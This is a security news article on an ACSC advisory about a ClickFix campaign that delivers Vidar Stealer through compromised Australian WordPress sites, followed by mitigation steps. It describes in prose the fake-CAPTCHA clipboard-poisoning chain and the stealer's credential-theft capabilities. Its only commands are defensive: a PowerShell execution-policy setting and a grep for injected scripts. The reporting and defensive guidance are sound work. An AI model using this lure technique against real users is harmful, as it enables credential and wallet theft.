Ciphers Security News ACSC Warns: ClickFix Campaign Delivers Vidar Stealer via Compromised Australian WordPress Sites
News

ACSC Warns: ClickFix Campaign Delivers Vidar Stealer via Compromised Australian WordPress Sites

ACSC Warns: ClickFix Campaign Delivers Vidar Stealer via Compromised Australian WordPress Sites

The Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC — Australia's national cyber security authority, analogous to CISA in the United States) has issued an advisory warning organizations of an active ClickFix social engineering campaign using compromised WordPress websites to deliver the Vidar Stealer information-stealing malware against Australian organizations. The official ACSC advisory confirms the campaign has been escalating since early 2026, targeting multiple sectors across Australian infrastructure using legitimate Australian business websites as unwitting delivery vectors.

The ClickFix Technique Explained

ClickFix (formally cataloged by MITRE as ATT&CK T1204.004: Malicious Copy and Paste — a technique MITRE added specifically to document this social engineering pattern) is an attack method that exploits users' conditioned trust in browser verification prompts. The full attack chain:

  • An attacker compromises a legitimate WordPress-hosted website by exploiting a vulnerable plugin, theme, or outdated WordPress core, then injects a malicious JavaScript payload delivery domain into the site.
  • The injected domain loads JavaScript from an external API server, which overwrites the visible content of the legitimate page with a fraudulent Cloudflare "Verify you are human" CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) prompt that visually mimics the real Cloudflare verification widget.
  • The JavaScript simultaneously copies a malicious PowerShell command to the user's clipboard without any visible indication — the copy happens in the background during page load.
  • When the user clicks the verification checkbox, a pop-up appears instructing them to press Win+R (opening the Windows Run dialog), paste from the clipboard, and press Enter.
  • The user unknowingly executes the malicious PowerShell command with their user-level privileges, which downloads and installs Vidar Stealer.

The technique is effective precisely because it replicates a familiar, trusted UI (user interface) element — Cloudflare verification prompts are encountered legitimately millions of times daily — and relies entirely on user action rather than exploiting any software vulnerability. Traditional drive-by download detection and browser-based exploit prevention tools do not flag clipboard manipulation.

Vidar Stealer: Capabilities and Evasion

Vidar Stealer is a commercially distributed (sold as MaaS — Malware-as-a-Service on criminal forums) information stealer capable of exfiltrating:

  • Saved browser credentials: usernames and passwords stored in Chrome, Firefox, Edge, and other Chromium-based browsers
  • Browser session cookies: allowing account takeover without requiring the victim's password — the attacker simply imports the cookie into their own browser
  • Cryptocurrency wallet files and seed phrases: direct theft of digital currency holdings
  • Two-factor authentication app databases: enabling bypass of MFA (Multi-Factor Authentication) protections
  • System information and hardware fingerprints: used to build device profiles for follow-on fraud

Vidar employs self-deletion of its initial executable after delivery — the dropper that arrives via PowerShell removes itself from disk, leaving the malware operating primarily in memory. This behavior significantly reduces forensic recovery options: by the time an incident is detected, the initial payload file may no longer exist on disk, and memory-resident malware is invisible to file-based antivirus scans.

Exfiltrated data is transmitted to attacker-controlled infrastructure before the malware terminates its disk presence.

The Australian Campaign: Why It Matters

Since early 2026, ACSC has documented ClickFix attacks specifically compromising websites owned by legitimate Australian businesses — not generic foreign hosting or bulletproof providers. This operational choice is deliberate:

  • Reputation bypass: Traffic to a recognized Australian business domain is less likely to trigger corporate web proxies or email security gateways configured to allow domestic traffic
  • Geographic targeting: Geo-restriction controls used by some enterprises to block foreign web content do not flag domestic Australian domains
  • Trust exploitation: Employees may browse Australian supplier or partner websites without the same scrutiny they apply to unknown foreign sites

The campaign targets multiple Australian sectors, though ACSC has not publicly enumerated specific industry verticals in the advisory.

MITRE ATT&CK Mapping

| Technique | Name | ClickFix/Vidar Application | |—|—|—| | T1566.002 | Phishing: Spearphishing Link | Victims reach compromised sites via search results or embedded links | | T1204.004 | Malicious Copy and Paste | Core delivery mechanism — clipboard poisoning | | T1059.001 | Command and Scripting: PowerShell | Vidar delivered and executed via PowerShell | | T1555.003 | Credentials from Web Browsers | Browser credential and session cookie theft | | T1555.001 | Credentials from Password Stores | Cryptocurrency wallet file extraction | | T1027 | Obfuscated Files or Information | JavaScript injection obfuscates malicious payload | | T1070.004 | Indicator Removal: File Deletion | Vidar's self-deletion after execution |

Who Is Affected

Any Windows user who browses compromised Australian WordPress sites and follows the "verification" instructions is a potential Vidar Stealer victim. ClickFix is not sector-specific: the campaign targets anyone who visits an affected site, regardless of industry.

Australian businesses whose WordPress sites have been compromised are themselves victims — their infrastructure is being used as attack delivery rail, and their reputation is associated with the malware delivery.

Organizations with employees who regularly browse external business websites — vendor sites, supplier portals, industry news, partner communications — face ongoing exposure as long as compromised Australian WordPress sites remain active.

What You Should Do Right Now

  • Restrict PowerShell execution for non-administrative users. An Execution Policy of AllSigned or RemoteSigned prevents unsigned scripts — including PowerShell payloads delivered via ClickFix — from executing. Enforce organization-wide via Group Policy:

Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine
  • Deploy application allow-listing. AppLocker or WDAC (Windows Defender Application Control) policies restricting which executables can launch prevent the Vidar Stealer dropper from running even when a user follows through on the clipboard command.
  • Block the Win+R dialog for general users. Where users have no legitimate need for the Windows Run dialog, disable it via Group Policy: User Configuration → Administrative Templates → Start Menu and Taskbar → Remove Run menu from Start Menu.
  • WordPress site owners: patch all themes and plugins immediately. ACSC specifically directs WordPress administrators to apply all available security updates and remove unused or unmaintained themes and plugins, which are the most common initial access vectors for site compromise. WordPress installations are frequently compromised via vulnerable form builders, SEO plugins, and e-commerce extensions.
  • Audit externally facing WordPress sites for injected JavaScript. Look for unexpected scripts loading from external domains in theme header or footer files:

grep -r "fetch(\|XMLHttpRequest\|document.write" /var/www/html/wp-content/themes/

Flag any requests to domains not in your approved asset list.

  • Incident response for suspected victims. Users who may have followed a "verify you are human" prompt and executed a clipboard command should be treated as confirmed Vidar infections until proven otherwise: isolate the machine, rotate all browser-stored credentials, revoke active browser sessions (Google, Microsoft, banking portals), and submit the system for memory forensics if available.

Background: Understanding the Risk

ClickFix emerged in 2024 and has become one of the most replicated social engineering delivery techniques in 2026, used to distribute Lumma Stealer, DarkGate, NetSupport RAT, and now Vidar Stealer across multiple continents. Its prevalence reflects a fundamental attacker insight: users have been trained for years to complete browser verification prompts without scrutinizing what happens when they click. Cloudflare's real verification widget is ubiquitous and trusted; CAPTCHA fatigue has conditioned users to click "I am human" reflexively.

The use of legitimate Australian WordPress infrastructure as delivery mechanism reflects the broader trend of living-off-trusted-infrastructure attacks. Rather than hosting malicious content on domains that threat intelligence feeds will rapidly flag, attackers compromise reputable sites and inject their payload delivery code, riding the existing reputation of the legitimate domain until it is discovered and cleaned.

Vidar Stealer credentials sold on criminal markets fuel a wide range of follow-on attacks:

  • BEC (Business Email Compromise): stolen corporate email session cookies give attackers authenticated access to corporate email, enabling payment redirection fraud and supply chain impersonation
  • SaaS account takeover: session cookies for Salesforce, HubSpot, ServiceNow, or Slack allow attackers to move through corporate environments without triggering authentication alerts
  • Cryptocurrency theft: directly monetized via wallet file access
  • Credential resale: sold on markets like Russian Market, 2easy, or Genesis Market (where buyers pay per credential set)

WordPress compromise for ClickFix delivery typically exploits publicly known vulnerabilities in outdated plugins. Mass exploitation tools scan for specific plugin version fingerprints and automatically inject payloads — meaning a single unpatched plugin across thousands of Australian WordPress sites creates a broad campaign surface with minimal attacker effort.

Conclusion

ACSC's advisory confirms an active ClickFix campaign using compromised Australian WordPress sites to deliver Vidar Stealer against organizations across multiple Australian sectors. Organizations should restrict PowerShell execution, deploy application allow-listing, and audit public-facing WordPress installations for injected JavaScript. Australian WordPress site owners should apply all plugin and theme updates and remove unused components. Any user who may have executed a clipboard-pasted PowerShell command from a verification prompt should be treated as a potential Vidar Stealer victim and their machine isolated pending full credential rotation.

For any query contact us at contact@cipherssecurity.com

Tags:

Share This Post:

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Post

Mozilla Fixes Record 423 Firefox Bugs Using Claude Mythos AI Pipeline
News

Mozilla Fixes Record 423 Firefox Bugs Using Claude Mythos

May 8, 2026
CVE-2026-6973: Ivanti EPMM Zero-Day RCE Exploited, CISA Mandates Patch by May 10
News

CVE-2026-6973: Ivanti EPMM Zero-Day RCE Exploited, CISA Mandates Patch

May 8, 2026
Oracle Launches Monthly Critical Security Patch Updates to Close Gap Between Quarterly Cycles
News

Oracle Launches Monthly Critical Security Patch Updates to Close

May 6, 2026
WhatsApp Patches CVE-2026-23863 File Spoofing and CVE-2026-23866 URL Scheme Flaw
News

WhatsApp Patches CVE-2026-23863 File Spoofing and CVE-2026-23866 URL Scheme

May 6, 2026
CVE-2026-29014: MetInfo CMS PHP Injection Exploited in the Wild
News

CVE-2026-29014: MetInfo CMS PHP Injection Exploited in the Wild

May 6, 2026
Apache MINA CVE-2026-42778 and CVE-2026-42779: Dual CVSS 9.8 RCE Patched
News

Apache MINA CVE-2026-42778 and CVE-2026-42779: Dual CVSS 9.8 RCE

May 5, 2026